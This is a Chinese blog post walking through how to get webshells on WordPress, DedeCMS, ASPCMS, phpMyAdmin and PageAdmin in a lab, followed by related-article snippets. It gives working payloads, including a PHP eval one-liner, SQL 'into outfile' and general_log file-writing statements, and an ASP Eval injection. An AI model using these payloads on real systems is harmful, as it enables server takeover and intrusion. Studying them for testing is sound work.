常见的CMS漏洞

已于 2024-08-03 16:20:25 修改
阅读量262 收藏 7
点赞数 4
文章标签: 安全 服务器 web安全 sql phpmyadmin
于 2024-08-03 14:16:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C233333235/article/details/140889583
版权

WordPress

      WordPress是⼀个以 PHP MySQL 为平台的 ⾃由开源 的博客软件和 内容管理系统 。WordPress具 有插件架构和模板系统。截⾄2018年4⽉,排名前1000万的⽹站中超过30.6%使⽤WordPress。
WordPress是最受欢迎的⽹站 内容管理系统 。全球有⼤约30%的⽹站(7亿5000个)都是使用WordPress 架设⽹站的。WordPress是⽬前 因特⽹ 上最流⾏的博客系统。WordPress在最著名的⽹络发布阶段中脱 颖⽽出。如今,它被使⽤在超过7000万个站点上。

1.后台修改模板拿WebShell

在wordpress的模板中我们可以通过修改模板中的404.php文件,在内容中添加一句话木马,保存后即可访问并拿到shell

添加后点击更新文件,然后访问ip/wp-content/themes/GeneratePress/404.php,即可直接连接

DeDeCMS

      DedeCMS是织梦团队开发PHP ⽹站管理系统,它以简单、易⽤、⾼效为特⾊,组建出各种各样各 具特⾊的⽹站,如地⽅⻔户、⾏业⻔户、政府及企事业站点等。

1.通过⽂件管理器上传WebShell

我们通过目录uploads/dede进入管理后台后,进入文件上传,这里可以直接上传一句话木马,我们创建一个2332.php文件,内容为<?php @eval($_POST['cmd']); ?>,然后将其上传

发现成功上传,那么我们直接去访问这个文件,然后用蚁剑连接

发现成功连接

2.修改模板⽂件拿WebShell

这一次,我们打开主页目录修改

将其中的index.htm修改,在其内容的第一行添加一个一句话木马后保存

进入更新主页html,将主页位置改为index.php,这里改为php后缀,就可以运行内容中的一句话木马了,然后点击更新主页html,点击浏览

这样我们就可以用主页的url直接到蚁剑中去连接

3.后台任意命令执⾏拿WebShell

进入模块中的广告管理,点击增加一个新广告,

在广告内容的代码中添加一句话木马,别的都随便填,然后点击确定

保存后就可以点击代码,直接去访问给的路径,就可以到蚁剑中去连接了

蚁剑也成功连接

4.sql命令直接上传获取webshell

打开系统中的sql命令执行工具,这里可以直接执行sql命令,那么我们就可以利用sql中的into outfile语句写一个一句话木马文件上去,语句如下

select "<?php @eval($_POST['cmd']); ?>" into outfile 'E:/phpstudy_pro/WWW/2233.php';

点击确定后发现成功上传

那么我们直接访问并连接

ASPCMS(asp)

1.后台修改配置⽂件拿Shell(这个网站搭建时要注意权限)

我们访问/admin_aspcms/index.asp登录进入后台后,在扩展功能中打开幻灯片管理,然后开启抓包后点击保存

在抓到的数据包中有一个slideTextStatus=1的字样,我们将1替换为1%25><%25Eval(Request (chr(65)))%25><%25,然后放包,即可在这个页面中获取webshell

上面我们添加的这个语句会影响/config/AspCms_Config.asp 文件,

在弹出修改成功后,我们直接用蚁剑去连接目录/config//AspCms_Config.asp (连接密码为a)

发现连接成功

PhpMyadmin

1.通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell。

这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。

首先登陆进去后点击sql

运行sq语句show global variables like '%general%';即可查看日志文件的开启状态,这里是off,代表着没开启,我们需要先将其开启

利用语句set global general_log='on';将其设为开启

然后利用'set global general_log_file = 'E:/phpstudy_pro/WWW/233.php'可以修改日志保存文件,我们这里将其保存为网站根目录下的233.php文件,然后再次去show global variables like '%general%'以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行

直接查询一个一句话木马select “<?php eval($_POST[’cmd’]);?>”;这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell

2.通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。

首先我们查询确定一下数据库的位置,利用语句 select @@basedir;查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录

然后我们就可以利用into outfile语句给它网站根目录下写一句话木马了,构造语句如下

select "<?php @eval($_POST['cmd']); ?>" into outfile 'E:/phpstudy_pro/WWW/2233.php';

然后直接去访问这个文件,并用蚁剑连接

3.过滤 into outfile

如果过滤了第⼀种的图形化操作,那么我们可以用另一种方法,在变量中搜索gen

这里可以直接修改日志的启用状态和后缀,修改后,剩下的步骤就与1中一样了

Pageadmin(asp与sqlserver)

PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为
企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。
进入靶场后台后点击应用,插件安装,这里可以上传压缩包。但是因为我们这里是未授权版本,无法上传压缩包,如果是授权版本就可以成功上传了

靶场中,我们可以在工具里面的文件管理中上传文件

首先我们需要写一个一句话木马,用asp语言,我这里选择直接用哥斯拉生成

将其1.asp压缩后上传,就可以在文件中看到我们上传的文件了

点击解压即可将其解压出来,然后访问,并用蚁剑成功连接

Atopos`
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1980
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
CMS漏洞复现
qq_43613144的博客
07-20 6243
漏洞复现-啧啧啧
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 1028
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
CMS漏洞总结
include_voidmain的博客
08-01 4730
CMS漏洞总结
常见cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 656
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
【文件上传漏洞-08】常见编辑器上传以及常见CMS 上传漏洞
m0_64378913的博客
07-12 2217
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞
2301_76224593的博客
04-26 660
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
74cms v5.0.1漏洞
weixin_56049038的博客
04-13 2752
摘 要 远程连接命令/代码执行漏洞,简称RCE漏洞。RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口...
最新Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),绝对干货分享
2401_84296945的博客
05-14 428
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
SQL注入是一种常见Web应用安全漏洞,攻击者可以通过inject恶意的SQL代码来访问或修改敏感数据。在极致CMS中,我们发现了多个SQL注入漏洞,这些漏洞可以让攻击者轻松地访问或修改数据库中的数据。 例如,在FrPHP/...
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
越权漏洞是网络安全领域中常见的问题,尤其在内容管理系统(CMS)如Catfish(鲶鱼)中更为突出。这类漏洞允许未经授权的用户访问、修改或控制原本只应由特定权限用户操作的数据或功能。在本案例中,“Catfish(鲶鱼...
kMaper.py:CMS 漏洞扫描器 - 基于 Exploit-DB
05-31
《kMaper.py:基于Exploit-DB的CMS漏洞扫描器》 在网络安全领域,漏洞扫描器是必不可少的工具,它们能够帮助我们发现并识别网络系统中的潜在安全风险。kMaper.py是一款专用于CMS(内容管理系统)的漏洞扫描器,它...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 489
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 455
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 248
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
访问网站显示不安全怎么办?
joySSL_的博客
08-02 460
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
时间条件竞争漏洞 cms
12-20
时间条件竞争漏洞是一种常见的网络安全漏洞,通常发生在CMS(内容管理系统)中。这种漏洞利用了程序中的时间相关功能,例如文件的创建或修改时间,来进行攻击。攻击者可以利用这个漏洞来获取未授权的访问权限,或者进行其他恶意操作。 时间条件竞争漏洞的原理是在程序执行的不同时间点进行不同的操作,从而绕过系统的安全检查。例如,攻击者可以在某个请求发送后立即修改文件,然后在系统检查文件时,修改已经生效,导致安全检查失败。 要防范时间条件竞争漏洞,首先需要对CMS系统进行严格的安全审计和测试,确保程序中没有潜在的时间条件竞争漏洞。其次,开发人员需要在代码中加入适当的同步和锁定机制,以防止在不同时间点发生冲突,从而避免漏洞的利用。另外,及时更新CMS系统的补丁,也是防范时间条件竞争漏洞的有效措施。 总的来说,时间条件竞争漏洞是一种常见但危险的安全漏洞,对于CMS系统的开发和管理者来说,需要高度重视并采取相应的安全措施来防范这类漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值